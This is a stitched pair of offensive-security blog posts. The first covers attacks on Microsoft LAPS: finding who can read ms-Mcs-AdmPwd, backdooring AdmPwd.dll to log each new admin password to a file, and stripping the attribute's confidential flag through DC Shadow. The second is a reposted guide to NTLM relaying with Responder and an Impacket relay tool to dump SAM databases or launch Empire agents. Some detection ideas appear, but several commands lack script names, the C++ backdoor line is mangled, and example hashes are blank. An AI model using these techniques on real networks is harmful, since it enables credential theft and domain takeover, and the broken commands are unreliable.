Domain administrators and anyone who has full control over computer objects in AD can read and write both pieces of information (i.e., the password and its expiration timestamp). The password stored in AD is protected by an ACL; it is up to the sysadmins to define who can and who cannot read the attribute. When transferred over the network, both the password and the timestamp are encrypted with Kerberos, but when stored in AD, both are stored in clear text.

Components of LAPS:
  • Agent – Group Policy Client Side Extension (CSE)
    • Event logging and random password generation
  • PowerShell module
    • Solution configuration
  • Active Directory
    • Computer object, confidential attribute, audit trail in the security log of the domain controller

First, we will identify whether the LAPS solution has been installed on the machine on which we have gained a foothold. We will leverage a PowerShell cmdlet to check whether AdmPwd.dll exists:

Get-ChildItem 'C:\Program Files\LAPS\CSE\AdmPwd.dll'

The very next step is identifying who has read access to ms-Mcs-AdmPwd. We can use PowerView to identify users with read access to ms-Mcs-AdmPwd:

Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs |
    Where-Object {
        ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
        ($_.ActiveDirectoryRights -match 'ReadProperty')
    }

If RSAT (Remote Server Administration Tools) is enabled on the victim machine, there is an interesting way of identifying users with access to ms-Mcs-AdmPwd. We can simply run:

dsacls.exe 'Path to the AD DS Object'

Dumping LAPS password:

Once you have identified the users who have read access to ms-Mcs-AdmPwd, the next step is compromising those user accounts and then dumping the LAPS passwords in clear text.

I already did a blog post on ‘Dump LAPS password in clear text’ and would highly encourage readers to have a look at that post as well.

Tip: It is highly recommended to grant ms-Mcs-AdmPwd read access only to those who actually manage those computer objects, and to remove unwanted users from having read access.

Poisoning AdmPwd.dll:

Most of the previous research/attacks focus on the server side (i.e., looking for accounts that can read the passwords), not on the client side. Microsoft’s LAPS is a client-side extension which runs a single DLL that manages the password (AdmPwd.dll).

LAPS is based on an open source solution called “AdmPwd” developed by Jiri Formacek and has been part of the Microsoft product portfolio since May 2015. The LAPS solution performs no integrity checks or signature verification on the DLL file. The AdmPwd solution is compatible with Microsoft’s LAPS, so let’s poison the DLL by compiling the project from source and replacing the original DLL with it. Replacing the original DLL requires administrative privileges, and at this point we assume the user has already gained administrator privileges via LPE or other means.

Now let’s add these three or four lines to the AdmPwd solution and compile the malicious DLL. These lines are added at the point where the new password and timestamp would be reported to AD.

wofstream backdoor;"c:\\backdoor.txt");
backdoor << newPwd;
backdoor.close();

This way the adversary will appear normal: passwords will stay in sync and will also comply with the LAPS policy.

BONUS: Persistence of clear text password *

*Persistence till the time poisoned dll is unchanged.

Some possible detection/prevention ideas:

  • Validate the integrity/signature of AdmPwd.dll.
  • A File Integrity Monitoring (FIM) policy can be created to monitor any changes/modifications to the DLL.
  • Application whitelisting can be applied to detect/prevent poisoning.
  • Increase the LAPS logging level by setting the registry value to 2 (verbose mode, log everything).

Note: The above methods are just my ramblings; I am not sure whether all of these would actually detect or prevent the attack.

Modifying searchFlags attribute:

The attribute of interest is ms-Mcs-AdmPwd, which is a confidential attribute. Let’s first identify the searchFlags attribute of ms-Mcs-AdmPwd. We will be using the Active Directory PS module.


The searchFlags attribute value is 904 (0x388). From this value we need to remove the CF bit (0x00000080), which marks the attribute as confidential. After removing the confidential flag (0x388 - 0x80), the new value is 0x308, i.e. 776. We will leverage the DC Shadow attack to modify the searchFlags attribute.
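The flag arithmetic above can be sanity-checked in a few lines of Python (a sketch of the bit math only, not of the DC Shadow modification itself):

```python
CONFIDENTIAL = 0x00000080  # the CF bit in searchFlags

search_flags = 0x388            # 904, the current value on ms-Mcs-AdmPwd
new_flags = search_flags & ~CONFIDENTIAL  # clear only the CF bit

print(hex(new_flags), new_flags)  # 0x308 776
```

Using `& ~CONFIDENTIAL` rather than plain subtraction is the safer habit: it clears the bit regardless of whether it was set, while subtraction silently corrupts the value if the bit happens to be absent.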

Possible detections:

  • Anything which detects the DC Shadow attack, e.g. the ALSID team’s PowerShell script (it detects using the “LDAP_SERVER_NOTIFICATION_OID” and tracks what changes are registered in the AD infrastructure).
  • Microsoft ATA also detects malicious replications.
  • It can also be detected by comparing the metadata of the searchFlags attribute or even looking at the LocalChangeUSN which is inconsistent with searchFlags attribute.

Note: In my lab setup, when I removed the confidential flag on one DC, it got replicated to the other DCs as well (i.e., the searchFlags attribute value 776 was replicated to the other DCs). Another thing I noticed is that after every change the searchFlags version increases, but in my lab setup it stopped increasing after 10. If you find something different, do let me know.


Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes)

( Original text by byt3bl33d3r )

This blog post is mainly aimed to be a very ‘cut & dry’ practical guide to help clear up any confusion regarding NTLM relaying. Talking to pentesters I’ve noticed that there seems to be a lot of general confusion regarding what you can do with those pesky hashes you get with Responder. I also noticed there doesn’t seem to be an up to date guide on how to do this on the interwebs, and the articles that I did see about the subject either reference tools that are outdated, broken and/or not maintained anymore.

I won’t go into detail on all the specifics, since there are a TON of papers out there detailing how the attack actually works; this one from SANS is okay when it comes to the theory behind the attack.

Before we dive into the thick of it, we need to make sure we are on the same page about a couple of things.

NTLM vs. NTLMv1/v2 vs. Net-NTLMv1/v2

This is where the confusion starts for a lot of people and quite frankly I don’t blame them because all of the articles about this attack talk about NTLMv1/v2, so when they see Net-NTLMv1/v2 anywhere obviously people wonder if it’s the same thing.

Edit 06/05/2017 — Updated the TL;DR as it was brought to my attention the way I phrased it was still confusing.

TL;DR NTLMv1/v2 is a shorthand for Net-NTLMv1/v2 and hence are the same thing.

However, NTLM (without v1/v2) means something completely different.

NTLM hashes are stored in the Security Account Manager (SAM) database and in the Domain Controller’s NTDS.dit database. They look like this:


Contrary to what you’d expect, the LM hash is the one before the semicolon and the NT hash is the one after the semicolon. Starting with Windows Vista and Windows Server 2008, by default, only the NT hash is stored.

Net-NTLM hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user’s NT hash). Here’s an example of a Net-NTLMv2 (a.k.a NTLMv2) hash:


(This hash was taken from the Hashcat example hash page here)
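To make the challenge/response derivation concrete, here is a hedged Python sketch of how a Net-NTLMv2 response is computed from an NT hash: the NTLMv2 key is an HMAC-MD5 of the uppercased username plus domain (UTF-16LE), keyed with the NT hash, and the response is an HMAC-MD5 over the server challenge plus the client blob. The username, domain, challenge and blob below are made-up illustration values; only the NT hash is a well-known test value (the NT hash of the string “password”):

```python
import hmac
import hashlib

def ntlmv2_response(nt_hash: bytes, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """Sketch of the Net-NTLMv2 derivation. The key is HMAC-MD5 of
    uppercase(user) + domain in UTF-16LE, keyed with the NT hash;
    the response ("NTProofStr") is HMAC-MD5 over the server
    challenge concatenated with the client blob."""
    ntlmv2_key = hmac.new(nt_hash,
                          (user.upper() + domain).encode("utf-16-le"),
                          hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob,
                    hashlib.md5).digest()

# Well-known NT hash of the string "password" (MD4 of its UTF-16LE form)
nt = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
proof = ntlmv2_response(nt, "admin", "CONTOSO", b"\x11" * 8, b"dummy-blob")
print(len(proof))  # a 16-byte HMAC-MD5 digest
```

This one-way derivation is exactly why Net-NTLM hashes can be cracked or relayed but not passed: without the underlying NT hash, you cannot answer a fresh challenge.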

From a pentesting perspective:

  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.

You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller’s NTDS.dit database, or from Mimikatz (fun fact: although you can’t get clear-text passwords from Mimikatz on Windows >= 8.1, you can still get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that’s perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.

You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.

This article is going to be talking about what you can do with Net-NTLM hashes in modern Windows environments.

Relaying 101

Since MS08-068 you cannot relay a Net-NTLM hash back to the same machine you got it from (e.g. the ‘reflective’ attack) unless you’re performing a cross-protocol relay (which is an entirely different topic). However you can still relay the hash to another machine.

TL;DR you don’t have to crack the hashes you get from Responder, you can directly relay them to other machines!

What’s really cool about this? You can use Responder in combination with a relay tool to automatically intercept connections and relay authentication hashes!

The only caveat to this attack? SMB Signing needs to be disabled on the machine you’re relaying to. With the exception of Windows Server OSes, all Windows operating systems have SMB Signing disabled by default.

Personally, I consider SMB Signing to be one of the most overlooked and underrated security settings in Windows specifically because of this attack and how easy it allows for attackers to gain an initial foothold.

Setting up

Grab Responder (do not use the version of Responder in SpiderLabs’ GitHub repository as it isn’t maintained anymore; you should be using lgandx’s fork), edit the Responder.conf file and turn off the SMB and HTTP servers:

[Responder Core]

; Servers to start
SQL = On
SMB = Off     # Turn this off
Kerberos = On
FTP = On
POP = On
HTTP = Off    # Turn this off
DNS = On

Now you need a relaying tool.

There are 2 main tools that are maintained and updated regularly that can be used to perform relay attacks with Net-NTLMv1/v2 hashes:

I personally use Impacket’s, so I’ll stick with that for this blogpost.

Install Impacket using pip, or manually by git cloning the repo and running the setup file, and it will put the script in your path.

Now you need list of targets to relay to.

How you do that is up to you. I personally use CrackMapExec: V4 has a handy --gen-relay-list flag just for this:

cme smb <CIDR> --gen-relay-list targets.txt

The above command will generate a list of all hosts with SMB Signing disabled and output them to the specified file.

0wning Stuff

Now that you have everything you need, fire up Responder in one terminal window:

python -I <interface> -r -d -w

And in another: -tf targets.txt

By default, upon a successful relay, will dump the SAM database of the target.

Buuuuut, you know whats even better? How about executing a command? -tf targets.txt -c <insert your Empire Powershell launcher here>

Now, every time successfully relays a Net-NTLM hash, you will get an Empire agent! How cool is that?!

Here’s a video of how it looks in practice:

Let’s recap

  1. We’re using Responder to intercept authentication attempts (Net-NTLM hashes) via Multicast/Broadcast protocols.
  2. However, since we turned off Responder’s SMB and HTTP servers and have running, those authentication attempts get automatically passed to’s SMB and HTTP servers.
  3. takes over and relays those hashes to our target list. If the relay is successful, it will execute our Empire launcher and give us an Empire agent on the target machine.


SMB relaying attacks are still very much relevant. Having SMB Signing disabled, in combination with Multicast/Broadcast protocols, allows attackers to seamlessly intercept authentication attempts, relay them to other machines and gain an initial foothold on an Active Directory network in a matter of minutes.

Now, combine this with something like DeathStar and you have automated everything from getting a foothold to gaining Domain Admin rights!

Shout outs

These are the people responsible for these amazing tools, hard work and research. You should be following them everywhere!